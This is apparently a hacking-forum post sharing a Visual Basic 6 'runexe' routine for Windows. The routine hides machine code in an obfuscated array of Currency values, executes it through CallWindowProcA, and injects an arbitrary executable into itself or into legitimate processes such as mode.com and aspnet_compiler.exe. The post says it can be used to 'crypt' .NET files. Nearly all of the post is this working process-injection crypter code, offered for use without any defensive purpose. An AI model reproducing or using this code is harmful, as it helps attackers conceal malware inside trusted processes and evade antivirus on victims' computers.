8 Years of Service
87%
'tested on win xp,7,8,10 (x86/x64 OS)
How call?
Code:
>Private Declare Function cwpa Lib "C:\Windows\System32\USER32" Alias "CallWindowProcA" (ByRef cThunk As Currency, ByRef lParam1 As Byte, ByVal lParam2 As Long, ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
Private Function runexe(ByRef zbuff() As Byte, ByVal targetchek As Long, ByVal cmdcheck As Long) As Long
Dim zs(121) As Currency
zs(0) = 26259038771016.7381@: zs(1) = -744547587767789.1584@: zs(2) = -722930309554729.3528@: zs(3) = -909557015781689.0679@
zs(4) = -189809557413846.3415@: zs(5) = 523661484855527.2993@: zs(6) = 412066597071946.055@: zs(7) = -302984709675134.6143@
zs(8) = 538077590895380.5433@: zs(9) = 521583040200437.438@: zs(10) = 523545728273054.5174@: zs(11) = 480085991686968.7512@
zs(12) = -335578847433109.5072@: zs(13) = -449106093312022.4088@: zs(14) = -449053326945787.4399@: zs(15) = -332764111409899.0559@
zs(16) = -449111776453013.1424@: zs(17) = 124844172223110.8475@: zs(18) = -542786739712005.7688@: zs(19) = -449111459612909.5887@
zs(20) = -719523105471699.3366@: zs(21) = -449054866094294.2163@: zs(22) = 451608471944796.5985@: zs(23) = -607642772482743.825@
zs(24) = -607642777654603.3375@: zs(25) = 451265836116355.5873@: zs(26) = 451172521909504.2289@: zs(27) = -459206830194637.9042@
zs(28) = -449111498566570.1087@: zs(29) = -112946734837581.9042@: zs(30) = -449112141905372.4706@: zs(31) = 538077578662432.6475@
zs(32) = 523661482627103.7486@: zs(33) = -389228826157437.111@: zs(34) = -355428608943145.5266@: zs(35) = -303435288051573.59@
zs(36) = -790719380126081.3368@: zs(37) = -448382227241576.9824@: zs(38) = -390190677676344.4054@: zs(39) = -91329453190229.6866@
zs(40) = -301478597387776.5154@: zs(41) = -841969367495551.5104@: zs(42) = 538073001472381.6743@: zs(43) = -636461197512573.8954@
zs(44) = -637992481588166.9734@: zs(45) = -302900478747951.0752@: zs(46) = -442253300196153.5966@: zs(47) = -91329453189658.2274@
zs(48) = 494589780446806.3454@: zs(49) = -859005083204056.7817@: zs(50) = -820333491017706.0793@: zs(51) = 538077475591458.7185@
zs(52) = -722930310774434.6258@: zs(53) = -332488343499279.2887@: zs(54) = 124844633284962.2186@: zs(55) = -449093914264622.6014@
zs(56) = -419556562151225.3407@: zs(57) = -705065773658173.4232@: zs(58) = 480431510148663.3009@: zs(59) = -91329453189671.632@
zs(60) = 539282979902767.4078@: zs(61) = -449111405003031.8722@: zs(62) = -159248842802488.4054@: zs(63) = -457067620371639.0744@
zs(64) = -449111429847093.3727@: zs(65) = -552498055032837.405@: zs(66) = -836955744380986.0571@: zs(67) = -449111567717629.423@
zs(68) = -448379617845466.2277@: zs(69) = 124844633284962.2186@: zs(70) = -159320109016962.5694@: zs(71) = -41320402131634.5912@
zs(72) = 451374665332715.3953@: zs(73) = -456228813389033.3677@: zs(74) = 449111640486047.6193@: zs(75) = -438444347668115.951@
zs(76) = -456279509334703.4904@: zs(77) = -449111447026962.5567@: zs(78) = 451222437519159.1755@: zs(79) = -453438060041019.7263@
zs(80) = 540245876867675.6273@: zs(81) = 328991869881613.3325@: zs(82) = -754059718576563.4771@: zs(83) = -449224042815841.5497@
zs(84) = -249250386309440.8589@: zs(85) = -657310385672082.5374@: zs(86) = 300289058049525.0771@: zs(87) = -686090705539303.6588@
zs(88) = -556385395396127.9915@: zs(89) = 449111489257957.2818@: zs(90) = -750405877806182.0049@: zs(91) = -671682826581395.0904@
zs(92) = 436221467134913.3909@: zs(93) = -448552445631931.0626@: zs(94) = -916254939761282.4119@: zs(95) = -750941894900847.6339@
zs(96) = -656590603067797.2664@: zs(97) = 459358710235805.806@: zs(98) = -534882339259818.6786@: zs(99) = -592302698929920.07@
zs(100) = 300281279435880.8172@: zs(101) = -656309987712882.1414@: zs(102) = -534457832003999.5307@: zs(103) = 300284459842576.0629@
zs(104) = -655747037759460.8225@: zs(105) = -534457832003999.5307@: zs(106) = 300284459842576.0629@: zs(107) = -655775185257131.8811@
zs(108) = -656675462629129.0542@: zs(109) = 449111561413409.1584@: zs(110) = -534655859636474.7147@: zs(111) = -555765495902935.1612@
zs(112) = -656297075751389.1039@: zs(113) = -650232668080910.3787@: zs(114) = -555765495902935.1612@: zs(115) = -656297075754462.7423@
zs(116) = -650257081097918.2507@: zs(117) = -802981757047313.5507@: zs(118) = -840508716384632.408@: zs(119) = -900719923909255.8788@
zs(120) = -886173880037769.0904@: zs(121) = 83995056.2752@
runexe = cwpa(zs(0), zbuff(0), targetchek, cmdcheck)
End Function
Code:
>Dim ThreadID as long
ThreadID = runexe(yourdata(), 0, 0) '(first 0 = selfinject, second 0 = cmd support off / 1 = on)
also can pass inject
sample:
ThreadID = runexe(yourdata(), strptr("c:\windows\system32\mode.com"), 0)
also can test for crypt .NET files
ThreadID = runexe(yourdata(), strptr("C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"), 0)
Last edited by a moderator: